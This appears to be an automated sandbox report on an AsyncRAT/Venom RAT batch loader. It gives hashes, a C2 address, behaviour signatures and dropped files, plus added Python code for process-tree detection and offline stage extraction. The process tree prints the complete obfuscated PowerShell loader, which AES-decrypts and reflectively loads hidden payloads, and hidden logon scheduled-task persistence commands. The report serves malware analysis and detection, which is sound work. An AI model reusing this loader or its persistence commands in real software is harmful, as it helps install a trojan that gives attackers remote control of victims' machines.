Analysis

  • max time kernel
    18s
  • max time network
    17s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20240508-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    29-05-2024 15:03

General

  • Target

    Client.bat

  • Size

    285KB

  • MD5

    d8cfc3f47a867b0e75997070c3281de8

  • SHA1

    141a013d4677b2c2453b429372d6373b1a187c63

  • SHA256

    85d20a24df655ec1f11e1c39f5f4d74dfce232321dbe6b41a5159a8cf6073ca1

  • SHA512

    9da1cc237a7c324457b3c72ee31403edea528c6bb82e2a464fd29be70a4bf50a7fceabfeefb408e317b8dc0100ec6ffe7575182b6c3e7fa91f2e4767bfb84eac

  • SSDEEP

    6144:VQJ7TjZvuij8u3zn0YXT59/MD7/QGWwNfmkDbWibZ5LPN2:VijZvuijfz8XbZNY

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

147.185.221.19:38173

Mutex

uuhaiushdishajkdhwuasudh

Attributes
  • delay

    1

  • install

    true

  • install_file

    svhost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
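
The behaviours listed above map directly onto process-creation telemetry. The following is an added example (not part of this report or of any vendor rule set) that encodes them as rules and runs them over a set of events constructed from this report's process tree: a hidden PowerShell with -ep bypass launched from a .bat in a user-writable folder, a logon-triggered scheduled task at highest run level (both the schtasks and Register-ScheduledTask forms), WScript running a .vbs from %AppData%, and a dropped EXE whose name is one edit away from a system binary. The field names pid/ppid/image/cmdline and the benign control event are assumptions; the long -command bodies are abridged.

```python
"""Process-tree detection for the batch loader chain in this report.

Added example, not part of the sandbox report or of any vendor rule set. The
rules encode behaviours the Signatures section lists: hidden PowerShell with
-ep bypass launched from a .bat in a user-writable folder, a logon-trigger
scheduled task at highest run level, WScript running a .vbs from %AppData%,
and a dropped EXE whose name mimics a system binary. EVENTS is constructed
from the report's process tree (PIDs and paths copied, long -command bodies
abridged); the field names pid/ppid/image/cmdline are an assumption.
"""
import ntpath  # Windows path rules regardless of the analysis host
import re
from typing import Dict, List

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\system32\cmd.exe"
RO = r"C:\Users\Admin\AppData\Roaming"
LOADER = "powershell.exe -noprofile -windowstyle hidden -ep bypass -command function decrypt_function(...)"
EVENTS = [
    dict(pid=1488, ppid=0, image=CMD, cmdline=r'cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"'),
    dict(pid=1096, ppid=1488, image=PS, cmdline=LOADER),
    dict(pid=4568, ppid=1096, image=PS, cmdline="powershell.exe Register-ScheduledTask -TaskName "
         "'RuntimeBroker_startup_930_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -RunLevel Highest -Force"),
    dict(pid=3776, ppid=1096, image=r"C:\Windows\System32\WScript.exe", cmdline=f'WScript.exe "{RO}\\startup_str_930.vbs"'),
    dict(pid=4184, ppid=3776, image=CMD, cmdline=f'cmd.exe /c ""{RO}\\startup_str_930.bat" "'),
    dict(pid=3480, ppid=4184, image=PS, cmdline=LOADER),
    dict(pid=1636, ppid=3480, image=CMD, cmdline=f'cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr "{RO}\\svhost.exe" & exit'),
    dict(pid=4420, ppid=1636, image=r"C:\Windows\system32\schtasks.exe", cmdline=f'schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr "{RO}\\svhost.exe"'),
    dict(pid=636, ppid=3480, image=CMD, cmdline=r'cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6B2D.tmp.bat""'),
    dict(pid=4884, ppid=636, image=f"{RO}\\svhost.exe", cmdline=f'"{RO}\\svhost.exe"'),
    dict(pid=9001, ppid=9000, image=PS, cmdline=r"powershell.exe -File C:\Scripts\backup.ps1"),  # benign control (assumed)
]

USER_WRITABLE = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\", re.I)
SYSTEM_NAMES = {"svchost.exe", "runtimebroker.exe", "csrss.exe", "lsass.exe", "explorer.exe"}


def within_one_edit(a: str, b: str) -> bool:
    """True when a != b and one insert, delete or substitute maps a to b."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    i = j = edits = 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            i, j = i + 1, j + 1
            continue
        edits += 1
        if edits > 1:
            return False
        if len(a) > len(b):
            i += 1                   # character deleted from a
        elif len(a) < len(b):
            j += 1                   # character inserted into a
        else:
            i, j = i + 1, j + 1      # substitution
    return edits + (len(a) - i) + (len(b) - j) == 1


def rules(ev: dict) -> List[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    img = ntpath.basename(ev["image"]).lower()
    cl = ev["cmdline"].lower()
    hits = []
    if img == "powershell.exe" and "-windowstyle hidden" in cl and re.search(r"-(ep|executionpolicy) bypass", cl):
        hits.append("hidden_powershell_ep_bypass")
    if img == "cmd.exe" and ".bat" in cl and USER_WRITABLE.search(cl):
        hits.append("batch_from_user_writable_dir")
    if ("schtasks" in cl and "/sc onlogon" in cl and "/rl highest" in cl) or \
       ("register-scheduledtask" in cl and "-runlevel highest" in cl):
        hits.append("logon_task_highest_runlevel")
    if img in ("wscript.exe", "cscript.exe") and ".vbs" in cl and USER_WRITABLE.search(cl):
        hits.append("script_host_vbs_from_appdata")
    if USER_WRITABLE.search(ev["image"]) and any(img == s or within_one_edit(img, s) for s in SYSTEM_NAMES):
        hits.append("system_binary_lookalike_in_appdata")
    return hits


def ancestry(pid: int, by_pid: Dict[int, dict]) -> str:
    """Root-to-leaf chain of image names, e.g. 'cmd.exe > powershell.exe'."""
    chain = []
    while pid in by_pid:
        chain.append(ntpath.basename(by_pid[pid]["image"]).lower())
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(chain))


def scan(events: List[dict]) -> Dict[int, dict]:
    """Map each flagged PID to its rule hits and its process ancestry."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: {"rules": hits, "chain": ancestry(e["pid"], by_pid)}
            for e in events if (hits := rules(e))}


if __name__ == "__main__":
    for pid, r in scan(EVENTS).items():
        print(f"{pid:>5}  {', '.join(r['rules'])}\n       {r['chain']}")
```

The ancestry string is the part worth alerting on: a single hidden PowerShell is common in admin tooling, but cmd.exe > powershell.exe > wscript.exe > cmd.exe > powershell.exe > cmd.exe > schtasks.exe with a task pointing into AppData\Roaming is the persistence chain this report records, and the lookalike check catches "svhost.exe" without a hard-coded name list of every past variant.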

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BUKiAL31A5lT1/Xd5G5EmJWEX7sPvy0fexqhE5k6bBA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2NxhLszSFSKFC6LeW0LZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $teDyb=New-Object System.IO.MemoryStream(,$param_var); $JJOvu=New-Object System.IO.MemoryStream; $PzvNj=New-Object System.IO.Compression.GZipStream($teDyb, [IO.Compression.CompressionMode]::Decompress); $PzvNj.CopyTo($JJOvu); $PzvNj.Dispose(); $teDyb.Dispose(); $JJOvu.Dispose(); $JJOvu.ToArray();}function execute_function($param_var,$param2_var){ $bcxuR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mgbCE=$bcxuR.EntryPoint; $mgbCE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$TDoDY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client.bat').Split([Environment]::NewLine);foreach ($szRyi in $TDoDY) { if ($szRyi.StartsWith(':: ')) { $kbvkz=$szRyi.Substring(3); break; }}$payloads_var=[string[]]$kbvkz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_930_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_930.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4568
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_930.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_930.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4184
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BUKiAL31A5lT1/Xd5G5EmJWEX7sPvy0fexqhE5k6bBA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2NxhLszSFSKFC6LeW0LZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $teDyb=New-Object System.IO.MemoryStream(,$param_var); $JJOvu=New-Object System.IO.MemoryStream; $PzvNj=New-Object System.IO.Compression.GZipStream($teDyb, [IO.Compression.CompressionMode]::Decompress); $PzvNj.CopyTo($JJOvu); $PzvNj.Dispose(); $teDyb.Dispose(); $JJOvu.Dispose(); $JJOvu.ToArray();}function execute_function($param_var,$param2_var){ $bcxuR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mgbCE=$bcxuR.EntryPoint; $mgbCE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_930.bat';$TDoDY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_930.bat').Split([Environment]::NewLine);foreach ($szRyi in $TDoDY) { if ($szRyi.StartsWith(':: ')) { $kbvkz=$szRyi.Substring(3); break; }}$payloads_var=[string[]]$kbvkz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3480
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"' & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1636
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"'
                7⤵
                • Creates scheduled task(s)
                PID:4420
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6B2D.tmp.bat""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:636
              • C:\Windows\system32\timeout.exe
                timeout 3
                7⤵
                • Delays execution with timeout.exe
                PID:5064
              • C:\Users\Admin\AppData\Roaming\svhost.exe
                "C:\Users\Admin\AppData\Roaming\svhost.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:4884
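
The PowerShell command lines recorded under PIDs 1096 and 3480 are the whole loader: it reads its own .bat file, takes the first line beginning with ":: ", splits it on "\", base64-decodes each part, AES-CBC decrypts it with the key and IV embedded in the command, gunzips the result and hands it to Assembly.Load. The method names are hidden by writing them backwards and re-reversing them at run time ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String). Because the key and IV sit in the clear in the command line, the encryption is obfuscation, not protection, and the stages can be recovered statically. The following is an added example (not code from this report or from the malware author) that resolves the reversed-string trick, pulls the key, IV, line marker and separator out of the recorded command, and re-implements the decode pipeline so the stages are written to disk instead of executed. The recorded command excerpt is quoted from the process tree; the small .bat used in the test is constructed; the AES step assumes the `cryptography` package is installed.

```python
"""Offline stage extractor for the Client.bat loader shown in the process tree.

Added example, not code from the sandbox report or from the malware author. It
re-implements the loader's pipeline (base64 -> AES-256-CBC -> gzip -> .NET
assembly) as plain parsing so the embedded stages can be written to disk for
analysis instead of being loaded with Assembly.Load. RECORDED_CMD is an
excerpt of the PowerShell command line recorded under PID 1096; the AES step
assumes the `cryptography` package is available.
"""
import base64
import gzip
import re
from typing import List

# Excerpt of the recorded loader command (PID 1096); paths shortened.
RECORDED_CMD = (
    "$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')"
    "('BUKiAL31A5lT1/Xd5G5EmJWEX7sPvy0fexqhE5k6bBA='); "
    "$aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')"
    "('l2NxhLszSFSKFC6LeW0LZw=='); "
    "$bcxuR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); "
    "$TDoDY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('Client.bat')"
    ".Split([Environment]::NewLine); "
    "foreach ($szRyi in $TDoDY) { if ($szRyi.StartsWith(':: ')) { $kbvkz=$szRyi.Substring(3); break; }}"
    "$payloads_var=[string[]]$kbvkz.Split('\\');"
)

# '::(' or '.(' followed by the reversed-string trick, e.g.
#   [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
# PowerShell's [-1..-N] walks the string backwards over its last N characters.
_REVERSED = re.compile(r"(::|\.)\('([^']+)'\[-1\.\.-(\d+)\] -join ''\)")


def deobfuscate(cmd: str) -> str:
    """Replace each reversed-string member access with the plain member name."""
    def _fix(m):
        sep, s, n = m.group(1), m.group(2), int(m.group(3))
        return sep + s[-n:][::-1]
    return _REVERSED.sub(_fix, cmd)


def loader_config(cmd: str) -> dict:
    """Pull key, IV, payload line marker and blob separator out of the loader."""
    plain = deobfuscate(cmd)
    b64 = r"\[System\.Convert\]::FromBase64String\('([^']+)'\)"
    key = re.search(r"\.Key=" + b64, plain).group(1)
    iv = re.search(r"\.IV=" + b64, plain).group(1)
    marker = re.search(r"StartsWith\('([^']+)'\)", plain).group(1)
    sep = re.search(r"\.Split\('([^']+)'\)", plain).group(1)
    return {"key": base64.b64decode(key), "iv": base64.b64decode(iv),
            "marker": marker, "sep": sep}


def extract_blobs(bat_text: str, marker: str = ":: ", sep: str = "\\") -> List[bytes]:
    """Mirror the loader: the first line starting with `marker` carries the
    payloads, separated by `sep`, each base64 encoded."""
    for line in bat_text.splitlines():
        if line.startswith(marker):
            return [base64.b64decode(p) for p in line[len(marker):].split(sep)]
    return []


def decrypt_stage(blob: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC decrypt, strip PKCS7 padding, gunzip: what the loader does
    before Assembly.Load. Requires the `cryptography` package (assumption)."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(blob) + dec.finalize()
    return gzip.decompress(padded[:-padded[-1]])


def looks_like_pe(data: bytes) -> bool:
    """A recovered stage should be a PE (.NET assembly): 'MZ' magic."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    import sys
    cfg = loader_config(RECORDED_CMD)
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    for i, blob in enumerate(extract_blobs(text, cfg["marker"], cfg["sep"])):
        stage = decrypt_stage(blob, cfg["key"], cfg["iv"])
        name = f"stage{i}.bin"   # .bin, so nothing double-clicks it
        open(name, "wb").write(stage)
        print(name, len(stage), "bytes,", "PE" if looks_like_pe(stage) else "not PE")
```

Run it as `python extract.py Client.bat` on an analysis host. The key is 32 bytes (AES-256) and the IV 16 bytes; both are constant across this sample, and the dropped startup_str_930.bat in the Downloads section carries the same MD5/SHA1/SHA256 as the submitted Client.bat, so the same configuration decodes the persisted copy. Stage 0 is invoked with no arguments and stage 1 with an empty string array; both should come out as PE files, and anything that does not start with MZ means the blob order or the key has changed in a newer build.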

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    ee6f5f5e5924783870aeedeccdafe9da

    SHA1

    0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

    SHA256

    ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

    SHA512

    998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhq5cysd.l21.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmp6B2D.tmp.bat

    Filesize

    150B

    MD5

    9db9bcc9ea4f3f07e0966c4376ac2e36

    SHA1

    dd7c215357d9d114c310fa2676a47132682ecb50

    SHA256

    f6575cb910adee8028321ff19eaaefc1868d4111ef1e46ad429e37d80c5f0319

    SHA512

    2e7ca77df6df61757a3fd5cdd70567d874563abd72ab69560bde6f5d749f8c1a202c10cc3215afa4f982f70055d1fbb9f37c0221614958b0e3bcbc6487ccd575

  • C:\Users\Admin\AppData\Roaming\startup_str_930.bat

    Filesize

    285KB

    MD5

    d8cfc3f47a867b0e75997070c3281de8

    SHA1

    141a013d4677b2c2453b429372d6373b1a187c63

    SHA256

    85d20a24df655ec1f11e1c39f5f4d74dfce232321dbe6b41a5159a8cf6073ca1

    SHA512

    9da1cc237a7c324457b3c72ee31403edea528c6bb82e2a464fd29be70a4bf50a7fceabfeefb408e317b8dc0100ec6ffe7575182b6c3e7fa91f2e4767bfb84eac

  • C:\Users\Admin\AppData\Roaming\startup_str_930.vbs

    Filesize

    115B

    MD5

    88ffb62e847c50c3ccc6842790416f97

    SHA1

    27b9db39bf9fbd67e5ead0f3595b3d0d5af6e7e8

    SHA256

    9c5ea95dbc5ec0ba5f13a543bc31779129eea4b5d95b587b5533cc9721df7342

    SHA512

    b6f4aca8e7b2e103089186e6a450e55bdbcb3de8d07b2789cb436790c5aaddc6b9cab4f5089a4aabc988179a2acaee48cb111fe33fbdfe276ffe4d089f51d5f8

  • C:\Users\Admin\AppData\Roaming\svhost.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • memory/1096-14-0x000001D2D3DC0000-0x000001D2D3DF8000-memory.dmp

    Filesize

    224KB

  • memory/1096-13-0x000001D2BBC50000-0x000001D2BBC58000-memory.dmp

    Filesize

    32KB

  • memory/1096-51-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

  • memory/1096-0-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

    Filesize

    8KB

  • memory/1096-12-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

  • memory/1096-11-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

  • memory/1096-1-0x000001D2D3D70000-0x000001D2D3D92000-memory.dmp

    Filesize

    136KB

  • memory/3480-49-0x00000122E4F90000-0x00000122E4FA8000-memory.dmp

    Filesize

    96KB

  • memory/4568-30-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

  • memory/4568-18-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

  • memory/4568-17-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

  • memory/4568-16-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

  • memory/4884-68-0x0000027AFC320000-0x0000027AFC364000-memory.dmp

    Filesize

    272KB

  • memory/4884-69-0x0000027AFC740000-0x0000027AFC7B6000-memory.dmp

    Filesize

    472KB